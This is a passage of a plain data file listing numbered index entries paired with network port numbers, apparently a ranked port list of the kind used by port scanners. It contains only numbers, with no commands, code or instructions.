2027 | 8451 2028 | 8409 2029 | 8339 2030 | 8308 2031 | 8295 2032 | 8273 2033 | 8268 2034 | 8255 2035 | 8248 2036 | 8245 2037 | 8144 2038 | 8133 2039 | 8110 2040 | 8092 2041 | 8064 2042 | 8037 2043 | 8029 2044 | 8023 2045 | 8018 2046 | 8014 2047 | 7975 2048 | 7895 2049 | 7854 2050 | 7853 2051 | 7852 2052 | 7830 2053 | 7813 2054 | 7788 2055 | 7780 2056 | 7772 2057 | 7771 2058 | 7688 2059 | 7685 2060 | 7654 2061 | 7637 2062 | 7600 2063 | 7555 2064 | 7553 2065 | 7456 2066 | 7451 2067 | 7231 2068 | 7218 2069 | 7184 2070 | 7119 2071 | 7104 2072 | 7102 2073 | 7092 2074 | 7072 2075 | 7068 2076 | 7067 2077 | 7043 2078 | 7033 2079 | 6973 2080 | 6972 2081 | 6956 2082 | 6942 2083 | 6922 2084 | 6920 2085 | 6897 2086 | 6877 2087 | 6780 2088 | 6734 2089 | 6725 2090 | 6710 2091 | 6709 2092 | 6650 2093 | 6647 2094 | 6644 2095 | 6606 2096 | 65514 2097 | 65488 2098 | 6535 2099 | 65311 2100 | 65048 2101 | 64890 2102 | 64727 2103 | 64726 2104 | 64551 2105 | 64507 2106 | 64438 2107 | 64320 2108 | 6412 2109 | 64127 2110 | 64080 2111 | 63803 2112 | 63675 2113 | 6349 2114 | 63423 2115 | 6323 2116 | 63156 2117 | 6310 2118 | 63105 2119 | 6309 2120 | 62866 2121 | 6274 2122 | 6273 2123 | 62674 2124 | 6259 2125 | 62570 2126 | 62519 2127 | 6250 2128 | 62312 2129 | 62188 2130 | 62080 2131 | 62042 2132 | 62006 2133 | 61942 2134 | 61851 2135 | 61827 2136 | 61734 2137 | 61722 2138 | 61669 2139 | 61617 2140 | 61616 2141 | 61516 2142 | 61473 2143 | 61402 2144 | 6126 2145 | 6120 2146 | 61170 2147 | 61169 2148 | 61159 2149 | 60989 2150 | 6091 2151 | 6090 2152 | 60794 2153 | 60789 2154 | 60783 2155 | 60782 2156 | 60753 2157 | 60743 2158 | 60728 2159 | 60713 2160 | 6067 2161 | 60628 2162 | 60621 2163 | 60612 2164 | 60579 2165 | 60544 2166 | 60504 2167 | 60492 2168 | 60485 2169 | 60403 2170 | 60401 2171 | 60377 2172 | 60279 2173 | 60243 2174 | 60227 2175 | 60177 2176 | 60111 2177 | 60086 2178 | 60055 2179 | 60003 2180 | 60002 2181 | 60000 2182 | 59987 2183 | 59841 2184 | 59829 2185 | 59810 2186 | 59778 2187 | 5975 2188 | 5974 2189 | 5971 2190 | 59684 2191 | 5966 2192 | 5958 2193 | 59565 2194 | 5954 2195 | 5953 2196 | 59525 2197 | 59510 2198 | 59509 2199 | 59504 2200 | 5949 2201 | 59499 2202 | 5948 2203 | 5945 2204 | 5939 2205 | 5936 2206 | 5934 2207 | 59340 2208 | 5931 2209 | 5927 2210 | 5926 2211 | 5924 2212 | 5923 2213 | 59239 2214 | 5921 2215 | 5920 2216 | 59191 2217 | 5917 2218 | 59160 2219 | 59149 2220 | 59122 2221 | 59107 2222 | 5908 2223 | 59087 2224 | 58991 2225 | 58970 2226 | 58908 2227 | 5888 2228 | 5887 2229 | 5881 2230 | 5878 2231 | 5875 2232 | 5874 2233 | 58721 2234 | 5871 2235 | 58699 2236 | 58634 2237 | 58622 2238 | 58610 2239 | 5860 2240 | 5858 2241 | 58570 2242 | 58562 2243 | 5854 2244 | 5853 2245 | 5852 2246 | 5849 2247 | 58498 2248 | 5848 2249 | 58468 2250 | 5845 2251 | 58456 2252 | 58446 2253 | 58430 2254 | 5840 2255 | 5839 2256 | 5838 2257 | 58374 2258 | 5836 2259 | 5834 2260 | 5831 2261 | 58310 2262 | 58305 2263 | 5827 2264 | 5826 2265 | 58252 2266 | 5824 2267 | 5821 2268 | 5820 2269 | 5817 2270 | 58164 2271 | 58109 2272 | 58107 2273 | 5808 2274 | 58072 2275 | 5806 2276 | 5804 2277 | 57999 2278 | 57988 2279 | 57928 2280 | 57923 2281 | 57896 2282 | 57891 2283 | 57733 2284 | 57730 2285 | 57702 2286 | 57681 2287 | 57678 2288 | 57576 2289 | 57479 2290 | 57398 2291 | 57387 2292 | 5737 2293 | 57352 2294 | 57350 2295 | 5734 2296 | 57347 2297 | 57335 2298 | 5732 2299 | 57325 2300 | 57123 2301 | 5711 2302 | 57103 2303 | 57020 2304 | 56975 2305 | 56973 2306 | 56827 2307 | 56822 2308 | 56810 2309 | 56725 2310 | 56723 2311 | 56681 2312 | 5667 2313 | 56668 2314 | 5665 2315 | 56591 2316 | 56535 2317 | 56507 2318 | 56293 2319 | 56259 2320 | 5622 2321 | 5621 2322 | 5620 2323 | 5612 2324 | 5611 2325 | 56055 2326 | 56016 2327 | 55948 2328 | 55910 2329 | 55907 2330 | 55901 2331 | 55781 2332 | 55773 2333 | 55758 2334 | 55721 2335 | 55684 2336 | 55652 2337 | 55635 2338 | 55579 2339 | 55569 2340 | 55568 2341 | 55556 2342 | 5552 2343 | 55527 2344 | 55479 2345 | 55426 2346 | 55400 2347 | 55382 2348 | 55350 2349 | 55312 2350 | 55227 2351 | 55187 2352 | 55183 2353 | 55000 2354 | 54991 2355 | 54987 2356 | 54907 2357 | 54873 2358 | 54741 2359 | 54722 2360 | 54688 2361 | 54658 2362 | 54605 2363 | 5458 2364 | 5457 2365 | 54551 2366 | 54514 2367 | 5444 2368 | 5442 2369 | 5441 2370 | 54323 2371 | 54321 2372 | 54276 2373 | 54263 2374 | 54235 2375 | 54127 2376 | 54101 2377 | 54075 2378 | 53958 2379 | 53910 2380 | 53852 2381 | 53827 2382 | 53782 2383 | 5377 2384 | 53742 2385 | 5370 2386 | 53690 2387 | 53656 2388 | 53639 2389 | 53633 2390 | 53491 2391 | 5347 2392 | 53469 2393 | 53460 2394 | 53370 2395 | 53361 2396 | 53319 2397 | 53240 2398 | 53212 2399 | 53189 2400 | 53178 2401 | 53085 2402 | 52948 2403 | 5291 2404 | 52893 2405 | 52675 2406 | 52665 2407 | 5261 2408 | 5259 2409 | 52573 2410 | 52506 2411 | 52477 2412 | 52391 2413 | 52262 2414 | 52237 2415 | 52230 2416 | 52226 2417 | 52225 2418 | 5219 2419 | 52173 2420 | 52071 2421 | 52046 2422 | 52025 2423 | 52003 2424 | 52002 2425 | 52001 2426 | 52000 2427 | 51965 2428 | 51961 2429 | 51909 2430 | 51906 2431 | 51809 2432 | 51800 2433 | 51772 2434 | 51771 2435 | 51658 2436 | 51582 2437 | 51515 2438 | 51488 2439 | 51485 2440 | 51484 2441 | 5147 2442 | 51460 2443 | 51423 2444 | 51366 2445 | 51351 2446 | 51343 2447 | 51300 2448 | 5125 2449 | 51240 2450 | 51235 2451 | 51234 2452 | 51233 2453 | 5122 2454 | 5121 2455 | 51139 2456 | 51118 2457 | 51067 2458 | 51037 2459 | 51020 2460 | 51011 2461 | 50997 2462 | 5098 2463 | 5096 2464 | 5095 2465 | 50945 2466 | 5090 2467 | 50903 2468 | 5088 2469 | 50887 2470 | 50854 2471 | 50849 2472 | 50836 2473 | 50835 2474 | 50834 2475 | 50833 2476 | 50831 2477 | 50815 2478 | 50809 2479 | 50787 2480 | 50733 2481 | 50692 2482 | 50585 2483 | 50577 2484 | 50576 2485 | 50545 2486 | 50529 2487 | 50513 2488 | 50356 2489 | 50277 2490 | 50258 2491 | 50246 2492 | 50224 2493 | 50205 2494 | 50202 2495 | 50198 2496 | 50189 2497 | 5017 2498 | 5016 2499 | 50101 2500 | 50040 2501 | 50019 2502 | 50016 2503 | 49927 2504 | 49803 2505 | 49765 2506 | 49762 2507 | 49751 2508 | 49678 2509 | 49603 2510 | 49597 2511 | 49522 2512 | 49521 2513 | 49520 2514 | 49519 2515 | 49500 2516 | 49498 2517 | 49452 2518 | 49398 2519 | 49372 2520 | 49352 2521 | 4931 2522 | 49302 2523 | 49275 2524 | 49241 2525 | 49235 2526 | 49232 2527 | 49228 2528 | 49216 2529 | 49213 2530 | 49211 2531 | 49204 2532 | 49203 2533 | 49202 2534 | 49201 2535 | 49197 2536 | 49196 2537 | 49191 2538 | 49190 2539 | 49189 2540 | 49179 2541 | 49173 2542 | 49172 2543 | 49170 2544 | 49169 2545 | 49166 2546 | 49132 2547 | 49048 2548 | 4903 2549 | 49002 2550 | 48973 2551 | 48967 2552 | 48966 2553 | 48925 2554 | 48813 2555 | 48783 2556 | 48682 2557 | 48648 2558 | 48631 2559 | 4860 2560 | 4859 2561 | 48434 2562 | 48356 2563 | 4819 2564 | 48167 2565 | 48153 2566 | 48127 2567 | 48083 2568 | 48067 2569 | 48009 2570 | 47969 2571 | 47966 2572 | 4793 2573 | 47860 2574 | 47858 2575 | 47850 2576 | 4778 2577 | 47777 2578 | 4771 2579 | 4770 2580 | 47700 2581 | 4767 2582 | 47634 2583 | 4760 2584 | 47595 2585 | 47581 2586 | 47567 2587 | 47448 2588 | 47372 2589 | 47348 2590 | 47267 2591 | 47197 2592 | 4712 2593 | 47119 2594 | 47029 2595 | 47012 2596 | 46992 2597 | 46813 2598 | 46593 2599 | 4649 2600 | 4644 2601 | 46436 2602 | 46418 2603 | 46372 2604 | 46310 2605 | 46182 2606 | 46171 2607 | 46115 2608 | 4609 2609 | 4606 2610 | 46069 2611 | 46034 2612 | 45960 2613 | 45864 2614 | 45777 2615 | 45697 2616 | 45624 2617 | 45602 2618 | 45463 2619 | 45438 2620 | 45413 2621 | 4530 2622 | 45226 2623 | 45220 2624 | 4517 2625 | 4516 2626 | 45164 2627 | 45136 2628 | 45050 2629 | 45038 2630 | 44981 2631 | 44965 2632 | 4476 2633 | 4471 2634 | 44711 2635 | 44704 2636 | 4464 2637 | 44628 2638 | 44616 2639 | 44541 2640 | 44505 2641 | 44479 2642 | 44431 2643 | 44410 2644 | 44380 2645 | 44200 2646 | 44119 2647 | 44101 2648 | 44004 2649 | 4388 2650 | 43868 2651 | 4384 2652 | 43823 2653 | 43734 2654 | 43690 2655 | 43654 2656 | 43425 2657 | 43242 2658 | 43231 2659 | 43212 2660 | 43143 2661 | 43139 2662 | 43103 2663 | 43027 2664 | 43018 2665 | 43002 2666 | 42990 2667 | 42906 2668 | 42735 2669 | 42685 2670 | 42679 2671 | 42675 2672 | 42632 2673 | 42590 2674 | 42575 2675 | 42560 2676 | 42559 2677 | 42452 2678 | 42449 2679 | 42322 2680 | 42276 2681 | 42251 2682 | 42158 2683 | 42127 2684 | 42035 2685 | 42001 2686 | 41808 2687 | 41773 2688 | 41632 2689 | 41551 2690 | 41442 2691 | 41398 2692 | 41348 2693 | 41345 2694 | 41342 2695 | 41318 2696 | 41281 2697 | 41250 2698 | 41142 2699 | 41123 2700 | 40951 2701 | 40834 2702 | 40812 2703 | 40754 2704 | 40732 2705 | 40712 2706 | 40628 2707 | 40614 2708 | 40513 2709 | 40489 2710 | 40457 2711 | 40400 2712 | 40393 2713 | 40306 2714 | 40011 2715 | 40005 2716 | 40003 2717 | 40002 2718 | 40001 2719 | 39917 2720 | 39895 2721 | 39883 2722 | 39869 2723 | 39795 2724 | 39774 2725 | 39763 2726 | 39732 2727 | 39630 2728 | 39489 2729 | 39482 2730 | 39433 2731 | 39380 2732 | 39293 2733 | 39265 2734 | 39117 2735 | 39067 2736 | 38936 2737 | 38805 2738 | 38780 2739 | 38764 2740 | 38761 2741 | 38570 2742 | 38561 2743 | 38546 2744 | 38481 2745 | 38446 2746 | 38358 2747 | 38331 2748 | 38313 2749 | 38270 2750 | 38224 2751 | 38205 2752 | 38194 2753 | 38029 2754 | 37855 2755 | 37789 2756 | 37777 2757 | 37674 2758 | 37647 2759 | 37614 2760 | 37607 2761 | 37522 2762 | 37393 2763 | 37218 2764 | 37185 2765 | 37174 2766 | 37151 2767 | 37121 2768 | 36983 2769 | 36962 2770 | 36950 2771 | 36914 2772 | 36824 2773 | 36823 2774 | 36748 2775 | 36710 2776 | 36694 2777 | 36677 2778 | 36659 2779 | 36552 2780 | 36530 2781 | 36508 2782 | 36436 2783 | 36368 2784 | 36275 2785 | 36256 2786 | 36105 2787 | 36104 2788 | 36046 2789 | 35986 2790 | 35929 2791 | 35906 2792 | 35901 2793 | 35900 2794 | 35879 2795 | 35731 2796 | 35593 2797 | 35553 2798 | 35506 2799 | 35401 2800 | 35393 2801 | 35392 2802 | 35349 2803 | 35272 2804 | 35217 2805 | 35131 2806 | 35116 2807 | 35050 2808 | 35033 2809 | 34875 2810 | 34833 2811 | 34783 2812 | 34765 2813 | 34728 2814 | 34683 2815 | 34510 2816 | 34507 2817 | 34401 2818 | 34381 2819 | 34341 2820 | 34317 2821 | 34189 2822 | 34096 2823 | 34036 2824 | 34021 2825 | 33895 2826 | 33889 2827 | 33882 2828 | 33879 2829 | 33841 2830 | 33605 2831 | 33604 2832 | 33550 2833 | 33523 2834 | 33522 2835 | 33444 2836 | 33395 2837 | 33367 2838 | 33337 2839 | 33335 2840 | 33327 2841 | 33277 2842 | 33203 2843 | 33200 2844 | 33192 2845 | 33175 2846 | 33124 2847 | 33087 2848 | 33070 2849 | 33017 2850 | 33011 2851 | 33000 2852 | 32976 2853 | 32961 2854 | 32960 2855 | 32944 2856 | 32932 2857 | 32911 2858 | 32910 2859 | 32908 2860 | 32905 2861 | 32904 2862 | 32898 2863 | 32897 2864 | 32888 2865 | 32871 2866 | 32869 2867 | 32868 2868 | 32858 2869 | 32842 2870 | 32837 2871 | 32820 2872 | 32815 2873 | 32814 2874 | 32807 2875 | 32799 2876 | 32798 2877 | 32797 2878 | 32790 2879 | 32789 2880 | 32788 2881 | 32765 2882 | 32764 2883 | 32261 2884 | 32260 2885 | 32219 2886 | 32200 2887 | 32102 2888 | 32088 2889 | 32031 2890 | 32022 2891 | 32006 2892 | 31728 2893 | 31657 2894 | 31522 2895 | 31438 2896 | 31386 2897 | 31339 2898 | 31072 2899 | 31058 2900 | 31033 2901 | 30896 2902 | 30705 2903 | 30659 2904 | 30644 2905 | 30599 2906 | 30519 2907 | 30299 2908 | 30195 2909 | 30087 2910 | 29810 2911 | 29507 2912 | 29243 2913 | 29152 2914 | 29045 2915 | 28967 2916 | 28924 2917 | 28851 2918 | 28850 2919 | 28717 2920 | 28567 2921 | 28374 2922 | 28142 2923 | 28114 2924 | 27770 2925 | 27537 2926 | 27521 2927 | 27372 2928 | 27351 2929 | 27350 2930 | 27316 2931 | 27204 2932 | 27087 2933 | 27075 2934 | 27074 2935 | 27055 2936 | 27016 2937 | 27015 2938 | 26972 2939 | 26669 2940 | 26417 2941 | 26340 2942 | 26007 2943 | 26001 2944 | 25847 2945 | 25717 2946 | 25703 2947 | 25486 2948 | 25473 2949 | 25445 2950 | 25327 2951 | 25288 2952 | 25262 2953 | 25260 2954 | 25174 2955 | 24999 2956 | 24616 2957 | 24552 2958 | 24416 2959 | 24392 2960 | 24218 2961 | 23953 2962 | 23887 2963 | 23723 2964 | 23451 2965 | 23430 2966 | 23382 2967 | 23342 2968 | 23296 2969 | 23270 2970 | 23228 2971 | 23219 2972 | 23040 2973 | 23017 2974 | 22969 2975 | 22959 2976 | 22882 2977 | 22769 2978 | 22727 2979 | 22719 2980 | 22711 2981 | 22563 2982 | 22341 2983 | 22290 2984 | 22223 2985 | 22200 2986 | 22177 2987 | 22100 2988 | 22063 2989 | 22022 2990 | 21915 2991 | 21891 2992 | 21728 2993 | 21634 2994 | 21631 2995 | 21473 2996 | 21078 2997 | 21011 2998 | 20990 2999 | 20940 3000 | 20934 3001 | 20883 3002 | 20734 3003 | 20473 3004 | 20280 3005 | 20228 3006 | 20227 3007 | 20226 3008 | 20225 3009 | 20224 3010 | 20223 3011 | 20180 3012 | 20179 3013 | 20147 3014 | 20127 3015 | 20125 3016 | 20118 3017 | 20111 3018 | 20106 3019 | 20102 3020 | 20089 3021 | 20085 3022 | 20080 3023 | 20076 3024 | 20052 3025 | 20039 3026 | 20032 3027 | 20021 3028 | 20017 3029 | 20011 3030 | 19996 3031 | 19995 3032 | 19852 3033 | 19715 3034 | 19634 3035 | 19612 3036 | 19501 3037 | 19464 3038 | 19403 3039 | 19353 3040 | 19201 3041 | 19200 3042 | 19130 3043 | 19010 3044 | 18962 3045 | 18910 3046 | 18887 3047 | 18874 3048 | 18669 3049 | 18569 3050 | 18517 3051 | 18505 3052 | 18439 3053 | 18380 3054 | 18337 3055 | 18336 3056 | 18231 3057 | 18148 3058 | 18080 3059 | 18015 3060 | 18012 3061 | 17997 3062 | 17985 3063 | 17969 3064 | 17867 3065 | 17860 3066 | 17802 3067 | 17801 3068 | 17715 3069 | 17702 3070 | 17701 3071 | 17700 3072 | 17413 3073 | 17409 3074 | 17255 3075 | 17251 3076 | 17129 3077 | 17089 3078 | 17070 3079 | 17017 3080 | 17016 3081 | 16901 3082 | 16845 3083 | 16797 3084 | 16725 3085 | 16724 3086 | 16723 3087 | 16464 3088 | 16372 3089 | 16349 3090 | 16297 3091 | 16286 3092 | 16283 3093 | 16273 3094 | 16270 3095 | 16048 3096 | 15915 3097 | 15758 3098 | 15730 3099 | 15722 3100 | 15677 3101 | 15670 3102 | 15646 3103 | 15645 3104 | 15631 3105 | 15550 3106 | 15448 3107 | 15344 3108 | 15317 3109 | 15275 3110 | 15191 3111 | 15190 3112 | 15145 3113 | 15050 3114 | 15005 3115 | 14916 3116 | 14891 3117 | 14827 3118 | 14733 3119 | 14693 3120 | 14545 3121 | 14534 3122 | 14444 3123 | 14443 3124 | 14418 3125 | 14254 3126 | 14237 3127 | 14218 3128 | 14147 3129 | 13899 3130 | 13846 3131 | 13784 3132 | 13766 3133 | 13730 3134 | 13723 3135 | 13695 3136 | 13580 3137 | 13502 3138 | 13359 3139 | 13340 3140 | 13318 3141 | 13306 3142 | 13265 3143 | 13264 3144 | 13261 3145 | 13250 3146 | 13229 3147 | 13194 3148 | 13193 3149 | 13192 3150 | 13188 3151 | 13167 3152 | 13149 3153 | 13142 3154 | 13140 3155 | 13132 3156 | 13130 3157 | 13093 3158 | 13017 3159 | 12962 3160 | 12955 3161 | 12892 3162 | 12891 3163 | 12766 3164 | 12702 3165 | 12699 3166 | 12414 3167 | 12340 3168 | 12296 3169 | 12275 3170 | 12271 3171 | 12251 3172 | 12243 3173 | 12240 3174 | 12225 3175 | 12192 3176 | 12171 3177 | 12156 3178 | 12146 3179 | 12137 3180 | 12132 3181 | 12097 3182 | 12096 3183 | 12090 3184 | 12080 3185 | 12077 3186 | 12034 3187 | 12031 3188 | 12019 3189 | 11940 3190 | 11863 3191 | 11862 3192 | 11813 3193 | 11735 3194 | 11697 3195 | 11552 3196 | 11401 3197 | 11296 3198 | 11288 3199 | 11250 3200 | 11224 3201 | 11200 3202 | 11180 3203 | 11100 3204 | 11089 3205 | 11033 3206 | 11032 3207 | 11031 3208 | 11026 3209 | 11019 3210 | 11007 3211 | 11003 3212 | 10900 3213 | 10878 3214 | 10852 3215 | 10842 3216 | 10754 3217 | 10699 3218 | 10602 3219 | 10601 3220 | 10567 3221 | 10565 3222 | 10556 3223 | 10555 3224 | 10554 3225 | 10553 3226 | 10552 3227 | 10551 3228 | 10550 3229 | 10535 3230 | 10529 3231 | 10509 3232 | 10494 3233 | 10443 3234 | 10414 3235 | 10387 3236 | 10357 3237 | 10347 3238 | 10338 3239 | 10280 3240 | 10255 3241 | 10246 3242 | 10245 3243 | 10238 3244 | 10093 3245 | 10064 3246 | 10045 3247 | 10042 3248 | 10035 3249 | 10019 3250 | 10018 3251 | 1327 3252 | 2330 3253 | 2580 3254 | 2700 3255 | 1584 3256 | 9020 3257 | 3281 3258 | 2439 3259 | 1250 3260 | 1607 3261 | 1736 3262 | 1330 3263 | 2270 3264 | 2728 3265 | 2888 3266 | 3803 3267 | 5250 3268 | 1645 3269 | 1303 3270 | 3636 3271 | 1251 3272 | 1243 3273 | 1291 3274 | 1297 3275 | 1200 3276 | 1811 3277 | 4442 3278 | 1118 3279 | 8401 3280 | 2101 3281 | 2889 3282 | 1694 3283 | 1730 3284 | 1912 3285 | 1745 3286 | 2250 3287 | 1306 3288 | 2997 3289 | 2449 3290 | 1262 3291 | 4007 3292 | 1101 3293 | 1268 3294 | 1735 3295 | 1858 3296 | 1264 3297 | 1711 3298 | 3118 3299 | 4601 3300 | 1321 3301 | 1598 3302 | 1305 3303 | 1632 3304 | 9995 3305 | 1307 3306 | 1981 3307 | 2532 3308 | 1808 3309 | 2435 3310 | 1194 3311 | 1622 3312 | 1239 3313 | 1799 3314 | 2882 3315 | 1683 3316 | 3062 3317 | 1340 3318 | 4447 3319 | 1806 3320 | 6888 3321 | 2438 3322 | 1261 3323 | 5969 3324 | 9343 3325 | 2583 3326 | 2031 3327 | 3798 3328 | 2269 3329 | 20001 3330 | 2622 3331 | 11001 3332 | 1207 3333 | 2850 3334 | 21201 3335 | 2908 3336 | 3936 3337 | 3023 3338 | 2280 3339 | 2623 3340 | 7099 3341 | 2372 3342 | 1318 3343 | 1339 3344 | 1276 3345 | 11000 3346 | 48619 3347 | 3497 3348 | 1209 3349 | 1331 3350 | 1240 3351 | 3856 3352 | 2987 3353 | 2326 3354 | 25001 3355 | 25000 3356 | 1792 3357 | 3919 3358 | 1299 3359 | 2984 3360 | 1715 3361 | 1703 3362 | 1677 3363 | 2086 3364 | 1708 3365 | 1228 3366 | 3787 3367 | 5502 3368 | 1620 3369 | 1316 3370 | 1569 3371 | 1210 3372 | 1691 3373 | 1282 3374 | 2124 3375 | 1791 3376 | 2150 3377 | 9909 3378 | 4022 3379 | 1324 3380 | 2584 3381 | 2300 3382 | 9287 3383 | 2806 3384 | 1566 3385 | 1713 3386 | 1592 3387 | 3749 3388 | 1302 3389 | 1709 3390 | 3485 3391 | 2418 3392 | 2472 3393 | 24554 3394 | 3146 3395 | 2134 3396 | 2898 3397 | 9161 3398 | 9160 3399 | 2930 3400 | 1319 3401 | 3811 3402 | 2456 3403 | 2901 3404 | 6579 3405 | 2550 3406 | 8403 3407 | 31416 3408 | 22273 3409 | 7005 3410 | 66 3411 | 32786 3412 | 32787 3413 | 706 3414 | 635 3415 | 6105 3416 | 400 3417 | 47 3418 | 830 3419 | 4008 3420 | 5977 3421 | 1989 3422 | 1444 3423 | 3985 3424 | 678 3425 | 27001 3426 | 591 3427 | 642 3428 | 446 3429 | 1441 3430 | 54320 3431 | 11 3432 | 769 3433 | 983 3434 | 979 3435 | 973 3436 | 967 3437 | 965 3438 | 961 3439 | 942 3440 | 935 3441 | 926 3442 | 925 3443 | 914 3444 | 863 3445 | 858 3446 | 844 3447 | 834 3448 | 817 3449 | 815 3450 | 811 3451 | 809 3452 | 789 3453 | 779 3454 | 743 3455 | 1019 3456 | 1507 3457 | 1492 3458 | 509 3459 | 762 3460 | 5632 3461 | 578 3462 | 1495 3463 | 5308 3464 | 52 3465 | 219 3466 | 525 3467 | 1420 3468 | 665 3469 | 620 3470 | 3064 3471 | 3045 3472 | 653 3473 | 158 3474 | 716 3475 | 9991 3476 | 3049 3477 | 1366 3478 | 1364 3479 | 833 3480 | 91 3481 | 1680 3482 | 3398 3483 | 750 3484 | 615 3485 | 603 3486 | 6110 3487 | 101 3488 | 989 3489 | 27010 3490 | 510 3491 | 1139 3492 | 4199 3493 | 76 3494 | 847 3495 | 649 3496 | 707 3497 | 68 3498 | 449 3499 | 664 3500 | 75 3501 | 104 3502 | 629 3503 | 1652 3504 | 682 3505 | 577 3506 | 985 3507 | 984 3508 | 974 3509 | 958 3510 | 952 3511 | 949 3512 | 946 3513 | 923 3514 | 916 3515 | 899 3516 | 897 3517 | 894 3518 | 889 3519 | 835 3520 | 824 3521 | 814 3522 | 807 3523 | 804 3524 | 798 3525 | 733 3526 | 727 3527 | 237 3528 | 12 3529 | 10 3530 | 501 3531 | 122 3532 | 440 3533 | 771 3534 | 861 3535 | 1663 3536 | 828 3537 | 860 3538 | 695 3539 | 634 3540 | 538 3541 | 1359 3542 | 1358 3543 | 1517 3544 | 1370 3545 | 3900 3546 | 492 3547 | 268 3548 | 27374 3549 | 605 3550 | 8076 3551 | 1651 3552 | 1178 3553 | 6401 3554 | 761 3555 | 5145 3556 | 50 3557 | 2018 3558 | 1349 3559 | 2014 3560 | 7597 3561 | 2120 3562 | 1445 3563 | 1402 3564 | 1465 3565 | 9104 3566 | 627 3567 | 4660 3568 | 7273 3569 | 950 3570 | 1384 3571 | 1388 3572 | 760 3573 | 92 3574 | 831 3575 | 5978 3576 | 4557 3577 | 45 3578 | 112 3579 | 1214 3580 | 3086 3581 | 702 3582 | 6665 3583 | 1404 3584 | 651 3585 | 5300 3586 | 6347 3587 | 5400 3588 | 1389 3589 | 647 3590 | 448 3591 | 1356 3592 | 5232 3593 | 1484 3594 | 450 3595 | 1991 3596 | 1988 3597 | 1523 3598 | 1400 3599 | 1399 3600 | 221 3601 | 1385 3602 | 5191 3603 | 1346 3604 | 2024 3605 | 2430 3606 | 988 3607 | 962 3608 | 948 3609 | 945 3610 | 941 3611 | 938 3612 | 936 3613 | 929 3614 | 927 3615 | 919 3616 | 906 3617 | 883 3618 | 881 3619 | 875 3620 | 872 3621 | 870 3622 | 866 3623 | 855 3624 | 851 3625 | 850 3626 | 841 3627 | 836 3628 | 826 3629 | 820 3630 | 819 3631 | 816 3632 | 813 3633 | 791 3634 | 745 3635 | 736 3636 | 735 3637 | 724 3638 | 719 3639 | 343 3640 | 334 3641 | 300 3642 | 28 3643 | 249 3644 | 230 3645 | 16 3646 | 1018 3647 | 1016 3648 | 658 3649 | 1474 3650 | 696 3651 | 630 3652 | 663 3653 | 2307 3654 | 1552 3655 | 609 3656 | 741 3657 | 353 3658 | 638 3659 | 1551 3660 | 661 3661 | 491 3662 | 640 3663 | 507 3664 | 673 3665 | 632 3666 | 1354 3667 | 9105 3668 | 6143 3669 | 676 3670 | 214 3671 | 14141 3672 | 182 3673 | 69 3674 | 27665 3675 | 1475 3676 | 97 3677 | 633 3678 | 560 3679 | 799 3680 | 7009 3681 | 2015 3682 | 628 3683 | 751 3684 | 4480 3685 | 1403 3686 | 8123 3687 | 1527 3688 | 723 3689 | 1466 3690 | 1486 3691 | 1650 3692 | 991 3693 | 832 3694 | 137 3695 | 1348 3696 | 685 3697 | 1762 3698 | 6701 3699 | 994 3700 | 4500 3701 | 194 3702 | 180 3703 | 1539 3704 | 1379 3705 | 51 3706 | 886 3707 | 2064 3708 | 1405 3709 | 1435 3710 | 11371 3711 | 1401 3712 | 1369 3713 | 402 3714 | 103 3715 | 1372 3716 | 704 3717 | 854 3718 | 47557 3719 | 624 3720 | 1387 3721 | 3397 3722 | 1996 3723 | 1995 3724 | 1997 3725 | 18182 3726 | 18184 3727 | 3264 3728 | 3292 3729 | 13720 3730 | 9107 3731 | 9106 3732 | 201 3733 | 1381 3734 | 35 3735 | 6588 3736 | 5530 3737 | 3141 3738 | 670 3739 | 970 3740 | 968 3741 | 964 3742 | 963 3743 | 960 3744 | 959 3745 | 951 3746 | 947 3747 | 944 3748 | 939 3749 | 933 3750 | 909 3751 | 895 3752 | 891 3753 | 879 3754 | 869 3755 | 868 3756 | 867 3757 | 837 3758 | 821 3759 | 812 3760 | 797 3761 | 796 3762 | 794 3763 | 788 3764 | 756 3765 | 734 3766 | 721 3767 | 718 3768 | 708 3769 | 703 3770 | 60 3771 | 40 3772 | 253 3773 | 231 3774 | 14 3775 | 1017 3776 | 1003 3777 | 656 3778 | 975 3779 | 2026 3780 | 1497 3781 | 553 3782 | 511 3783 | 611 3784 | 689 3785 | 1668 3786 | 1664 3787 | 15 3788 | 561 3789 | 997 3790 | 505 3791 | 1496 3792 | 637 3793 | 213 3794 | 1412 3795 | 1515 3796 | 692 3797 | 694 3798 | 681 3799 | 680 3800 | 644 3801 | 675 3802 | 1467 3803 | 454 3804 | 622 3805 | 1476 3806 | 1373 3807 | 770 3808 | 262 3809 | 654 3810 | 1535 3811 | 58 3812 | 177 3813 | 26208 3814 | 677 3815 | 1519 3816 | 1398 3817 | 3457 3818 | 401 3819 | 412 3820 | 493 3821 | 13713 3822 | 94 3823 | 1498 3824 | 871 3825 | 1390 3826 | 6145 3827 | 133 3828 | 362 3829 | 118 3830 | 193 3831 | 115 3832 | 1549 3833 | 7008 3834 | 608 3835 | 1426 3836 | 1436 3837 | 38 3838 | 74 3839 | 73 3840 | 71 3841 | 601 3842 | 136 3843 | 4144 3844 | 129 3845 | 16444 3846 | 1446 3847 | 4132 3848 | 308 3849 | 1528 3850 | 1365 3851 | 1393 3852 | 1394 3853 | 1493 3854 | 138 3855 | 5997 3856 | 397 3857 | 29 3858 | 31 3859 | 44 3860 | 2627 3861 | 6147 3862 | 1510 3863 | 568 3864 | 350 3865 | 2053 3866 | 6146 3867 | 6544 3868 | 1763 3869 | 3531 3870 | 399 3871 | 1537 3872 | 1992 3873 | 1355 3874 | 1454 3875 | 261 3876 | 887 3877 | 200 3878 | 1376 3879 | 1424 3880 | 6111 3881 | 1410 3882 | 1409 3883 | 686 3884 | 5301 3885 | 5302 3886 | 1513 3887 | 747 3888 | 9051 3889 | 1499 3890 | 7006 3891 | 1439 3892 | 1438 3893 | 8770 3894 | 853 3895 | 196 3896 | 93 3897 | 410 3898 | 462 3899 | 619 3900 | 1529 3901 | 1990 3902 | 1994 3903 | 1986 3904 | 1386 3905 | 18183 3906 | 18181 3907 | 6700 3908 | 1442 3909 | 95 3910 | 6400 3911 | 1432 3912 | 1548 3913 | 486 3914 | 1422 3915 | 114 3916 | 1397 3917 | 6142 3918 | 1827 3919 | 626 3920 | 422 3921 | 688 3922 | 206 3923 | 202 3924 | 204 3925 | 1483 3926 | 7634 3927 | 774 3928 | 699 3929 | 2023 3930 | 776 3931 | 672 3932 | 1545 3933 | 2431 3934 | 697 3935 | 982 3936 | 978 3937 | 972 3938 | 966 3939 | 957 3940 | 956 3941 | 934 